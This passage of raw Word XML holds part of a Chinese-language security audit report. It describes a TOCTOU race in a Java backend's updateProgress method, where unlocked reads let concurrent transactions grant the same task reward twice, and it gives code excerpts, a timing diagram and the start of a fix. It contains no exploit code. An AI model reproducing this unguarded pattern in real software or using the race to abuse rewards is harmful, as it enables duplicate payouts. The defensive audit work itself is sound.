        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m267_1245_userKycVerifiedTask_ctrl-path17of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m267_1247_userKycVerifiedTask_ctrl-path18of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m267_1252_userKycVerifiedTask_ctrl-path20of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m267_1254_userKycVerifiedTask_ctrl-path21of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m267_1258_userKycVerifiedTask_ctrl-path22of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m267_1262_userKycVerifiedTask_ctrl-path24of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m267_1265_userKycVerifiedTask_ctrl-path25of29.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m267_1268_userKycVerifiedTask_ctrl-path27of29.md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：TaskExecutionService.java#updateProgress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_62" w:id="62"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞61：非每日任务奖励发放 TOCTOU 竞态条件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="133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updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 非每日任务分支缺乏幂等保护导致重复奖励发放</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="133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src/main/java/com/gameBack/mjservice/service/TaskExecutionService.java:updateProgress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="133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：并发竞态 / TOCTOU（检查-执行时间差）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="133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33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：无需用户交互（由后端调度驱动，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 可被并发触发）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1337"/>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updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>每日任务（taskType=1）分支</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 通过唯一约束插入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DailyTaskAwardIssued</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 并捕获 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DataIntegrityViolationException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 实现了幂等保护；但 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>非每日任务（taskType≠1）分支</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 完全缺乏等效保护：读取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserTaskRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时未使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，仅依赖软检查 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status &gt;= 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，在并发窗口内两个事务均可通过该检查并各自调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，从而导致同一任务重复发奖。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法体在本次提供的上下文中未包含，无法判定其自身是否有幂等保护；若无，则本竞态直接导致奖励资产被多倍发放。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="133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调用层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调度入口</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UserScheduler.java:firstTradeTask</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@Scheduled</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 每 10 分钟触发，调用 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="EFF0F1"/>
              </w:rPr>
              <w:t>updateProgress(user.getId(), "4", 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漏洞点</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TaskExecutionService.java:updateProgress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非每日任务分支无锁读 + 无幂等写，直接调用 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="EFF0F1"/>
              </w:rPr>
              <w:t>applyReward</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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调度触发入口：UserScheduler.java</w:t>
              <w:br/>
              <w:t>@Scheduled(fixedRate = 10 * 60 * 1000L)</w:t>
              <w:br/>
              <w:t>public void firstTradeTask() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    var users = userRepository.findByHasTradedAndIsNewUserAndOpenIdIsNotNull(0, 0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (User user : users) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            boolean traded = coinWService.firstTrade(openId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (traded &amp;&amp; hasTraded == 0) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                user.setHasTraded(1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">                userRepository.save(user);          // ← hasTraded 写库（非事务内，与 updateProgress 独立）</w:t>
              <w:br/>
              <w:t xml:space="preserve">                taskExecutionService.updateProgress(user.getId(), "4", 1);  // ← 独立事务调用</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        } catch (Exception ignored) { }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 漏洞核心：TaskExecutionService.java:updateProgress</w:t>
              <w:br/>
              <w:t>@Transactional   // 默认 READ COMMITTED，无 SERIALIZABLE / FOR UPDATE</w:t>
              <w:br/>
              <w:t>public void updateProgress(Long userId, String triggerCondition, int delta) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ========== 每日任务分支（有幂等保护，对比参考）==========</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (taskType == 1) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            dailyTaskAwardIssuedRepository.save(new DailyTaskAwardIssued(userId, taskId, today)); // ← 唯一约束兜底</w:t>
              <w:br/>
              <w:t xml:space="preserve">            applyReward(userId, task.getId());</w:t>
              <w:br/>
              <w:t xml:space="preserve">        } catch (DataIntegrityViolationException e) { /* 重复发奖，忽略 */ }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        continue;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // ========== 非每日任务分支（无幂等保护 ← 漏洞点）==========</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserTaskRecord userTaskRecord = userTaskRecordRepository.findByUserIdAndTaskId(userId, taskId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseGet(() -&gt; { ... return userTaskRecordRepository.save(r); });</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ 普通 SELECT，无 FOR UPDATE；并发事务均可读到 status &lt; 2 的快照</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    if (userTaskRecord.getStatus() != null &amp;&amp; userTas</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>kRecord.getStatus() &gt;= 2) {  // ← 软检查，无锁保护</w:t>
              <w:br/>
              <w:t xml:space="preserve">        continue;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    int newProgress = (...getCurrentProgress()...) + delta;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userTaskRecord.setCurrentProgress(newProgress);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userTaskRecord.setStatus(1);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    if (newProgress &gt;= targetProgress) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userTaskRecord.setStatus(2);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userTaskRecord.setCompleteTime(LocalDateTime.now());</w:t>
              <w:br/>
              <w:t xml:space="preserve">        applyReward(userId, task.getId());  // ← 并发场景下可被多次调用，无唯一约束/CAS 保护</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userTaskRecordRepository.save(userTaskRecord);  // ← 最后写者覆盖，但 applyReward 已执行完毕</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竞态时序示意：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事务 T1（触发源 A）                事务 T2（触发源 B）</w:t>
              <w:br/>
              <w:t>─────────────────────────────────────────────────────</w:t>
              <w:br/>
              <w:t>findByUserIdAndTaskId → status=1  findByUserIdAndTaskId → status=1</w:t>
              <w:br/>
              <w:t>status &gt;= 2 ? NO → 继续            status &gt;= 2 ? NO → 继续</w:t>
              <w:br/>
              <w:t>newProgress = 0 + 1 = 1            newProgress = 0 + 1 = 1</w:t>
              <w:br/>
              <w:t>≥ targetProgress(1) → true         ≥ targetProgress(1) → true</w:t>
              <w:br/>
              <w:t>applyReward(userId, taskId) ✓      applyReward(userId, taskId) ✓  ← 重复发奖</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>save(status=2)                     save(status=2)（覆盖，但奖励已发两次）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用条件与影响：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1339"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>触发路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：本次分析属于 16/29 条下游路径之一，说明 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 存在多个调用入口。若另一调用路径（如 Webhook 回调、其他定时任务或 HTTP 接口）在首次 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>firstTradeTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 执行期间并发调用同一用户同一任务的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，即可命中该竞态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1340"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>幂等差异</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：每日任务通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DailyTaskAwardIssued</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 唯一约束实现幂等，非每日任务（S级、限定、日常类型）无等效机制——属于设计不一致缺陷。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1341"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>实际影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的实现未包含在本次上下文中，无法判定其自身是否有幂等保护。若 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 直接执行积分入账、虚拟货币发放等操作且无独立幂等控制，并发调用将导致同一任务奖励被重复发放。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1342"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录：否（由后端调度器内部触发）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1343"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：N/A（后端并发问题，无需外部请求）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>🔧 修复建议方向（供参考）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">参照每日任务分支的幂等设计，在非每日任务的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 前插入唯一约束记录（如扩展 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserTaskRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的数据库唯一索引到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(userId, taskId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">），或在读取时使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
